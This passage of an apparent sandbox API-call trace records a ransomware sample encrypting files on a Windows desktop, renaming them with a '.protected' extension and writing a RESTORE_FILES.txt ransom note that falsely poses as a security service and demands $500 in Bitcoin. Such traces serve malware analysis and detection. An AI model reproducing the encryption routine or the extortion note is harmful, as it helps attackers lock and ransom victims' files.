HALPmcxz\\Desktop\\rsdBWtbO v.mp3.protected") returned 66 [0091.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rsdbwtbo v.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rsdbwtbo v.mp3.protected")) returned 1 [0091.294] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.294] lstrcmpiW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="Windows") returned -1 [0091.294] lstrcmpiW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="Program Files") returned 1 [0091.295] lstrcmpiW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="Program Files (x86)") returned 1 [0091.295] lstrcmpiW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="$Recycle.bin") returned 1 [0091.295] lstrcmpiW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="System Volume Information") returned -1 [0091.295] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png") returned 65 [0091.295] StrStrIW (lpFirst="Sq8xDUaRjrYzUZE3R10.png", lpSrch=".protected") returned 0x0 [0091.295] lstrcmpW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.295] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.295] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sq8xduarjryzuze3r10.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png") returned 65 [0091.295] StrStrW (lpFirst="Sq8xDUaRjrYzUZE3R10.png", lpSrch=".txt") returned 0x0 [0091.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png") returned 65 [0091.295] StrStrW (lpFirst="Sq8xDUaRjrYzUZE3R10.png", lpSrch=".rar") returned 0x0 [0091.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png") returned 65 [0091.295] StrStrW (lpFirst="Sq8xDUaRjrYzUZE3R10.png", lpSrch=".zip") returned 0x0 [0091.295] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.296] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.296] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.296] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.296] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.296] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.296] CloseHandle (hObject=0xb4) returned 1 [0091.297] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png.protected") returned 75 [0091.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sq8xduarjryzuze3r10.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sq8xduarjryzuze3r10.png.protected")) returned 1 [0091.298] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.298] lstrcmpiW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="Windows") returned -1 [0091.298] lstrcmpiW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="Program Files") returned 1 [0091.298] lstrcmpiW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="Program Files (x86)") returned 1 [0091.298] lstrcmpiW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="$Recycle.bin") returned 1 [0091.298] lstrcmpiW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="System Volume Information") returned 1 [0091.298] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf") returned 63 [0091.298] StrStrIW (lpFirst="t6P4Y9hahIrm1AnV1.swf", lpSrch=".protected") returned 0x0 [0091.298] lstrcmpW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="RESTORE_FILES.txt") returned 1 [0091.298] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.298] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t6p4y9hahirm1anv1.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf") returned 63 [0091.298] StrStrW (lpFirst="t6P4Y9hahIrm1AnV1.swf", lpSrch=".txt") returned 0x0 [0091.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf") returned 63 [0091.298] StrStrW (lpFirst="t6P4Y9hahIrm1AnV1.swf", lpSrch=".rar") returned 0x0 [0091.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf") returned 63 [0091.299] StrStrW (lpFirst="t6P4Y9hahIrm1AnV1.swf", lpSrch=".zip") returned 0x0 [0091.299] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.299] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.299] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.299] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.299] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.300] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.300] CloseHandle (hObject=0xb4) returned 1 [0091.300] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf.protected") returned 73 [0091.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t6p4y9hahirm1anv1.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t6p4y9hahirm1anv1.swf.protected")) returned 1 [0091.301] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.301] lstrcmpiW (lpString1="UAuTbU.gif", lpString2="Windows") returned -1 [0091.301] lstrcmpiW (lpString1="UAuTbU.gif", lpString2="Program Files") returned 1 [0091.301] lstrcmpiW (lpString1="UAuTbU.gif", lpString2="Program Files (x86)") returned 1 [0091.301] lstrcmpiW (lpString1="UAuTbU.gif", lpString2="$Recycle.bin") returned 1 [0091.301] lstrcmpiW (lpString1="UAuTbU.gif", lpString2="System Volume Information") returned 1 [0091.301] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif") returned 52 [0091.301] StrStrIW (lpFirst="UAuTbU.gif", lpSrch=".protected") returned 0x0 [0091.301] lstrcmpW (lpString1="UAuTbU.gif", lpString2="RESTORE_FILES.txt") returned 1 [0091.301] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.301] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uautbu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif") returned 52 [0091.302] StrStrW (lpFirst="UAuTbU.gif", lpSrch=".txt") returned 0x0 [0091.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif") returned 52 [0091.302] StrStrW (lpFirst="UAuTbU.gif", lpSrch=".rar") returned 0x0 [0091.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif") returned 52 [0091.302] StrStrW (lpFirst="UAuTbU.gif", lpSrch=".zip") returned 0x0 [0091.302] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.302] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.302] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.302] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.302] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.303] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.303] CloseHandle (hObject=0xb4) returned 1 [0091.303] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif.protected") returned 62 [0091.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uautbu.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uautbu.gif.protected")) returned 1 [0091.304] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.304] lstrcmpiW (lpString1="zo4hbkGIFA.pptx", lpString2="Windows") returned 1 [0091.304] lstrcmpiW (lpString1="zo4hbkGIFA.pptx", lpString2="Program Files") returned 1 [0091.304] lstrcmpiW (lpString1="zo4hbkGIFA.pptx", lpString2="Program Files (x86)") returned 1 [0091.304] lstrcmpiW (lpString1="zo4hbkGIFA.pptx", lpString2="$Recycle.bin") returned 1 [0091.304] lstrcmpiW (lpString1="zo4hbkGIFA.pptx", lpString2="System Volume Information") returned 1 [0091.304] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx") returned 57 [0091.304] StrStrIW (lpFirst="zo4hbkGIFA.pptx", lpSrch=".protected") returned 0x0 [0091.304] lstrcmpW (lpString1="zo4hbkGIFA.pptx", lpString2="RESTORE_FILES.txt") returned 1 [0091.304] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.304] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zo4hbkgifa.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx") returned 57 [0091.304] StrStrW (lpFirst="zo4hbkGIFA.pptx", lpSrch=".txt") returned 0x0 [0091.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx") returned 57 [0091.304] StrStrW (lpFirst="zo4hbkGIFA.pptx", lpSrch=".rar") returned 0x0 [0091.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx") returned 57 [0091.305] StrStrW (lpFirst="zo4hbkGIFA.pptx", lpSrch=".zip") returned 0x0 [0091.305] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.305] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.305] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.305] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.305] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.305] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.306] CloseHandle (hObject=0xb4) returned 1 [0091.306] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx.protected") returned 67 [0091.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zo4hbkgifa.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zo4hbkgifa.pptx.protected")) returned 1 [0091.307] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.307] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.307] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES.txt") returned 59 [0091.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.308] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.308] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.308] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.308] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.309] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.309] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0091.309] CloseHandle (hObject=0xa4) returned 1 [0091.309] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.309] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0091.309] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0091.309] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0091.309] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0091.309] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0091.309] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 43 [0091.309] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0091.309] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0091.309] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 45 [0091.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.309] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.309] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.309] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.309] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.309] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.309] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\.") returned 45 [0091.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.309] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.309] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.309] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.309] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.310] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.310] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.310] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.310] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.310] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.310] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.310] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\..") returned 46 [0091.310] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.310] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.310] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.310] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.310] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 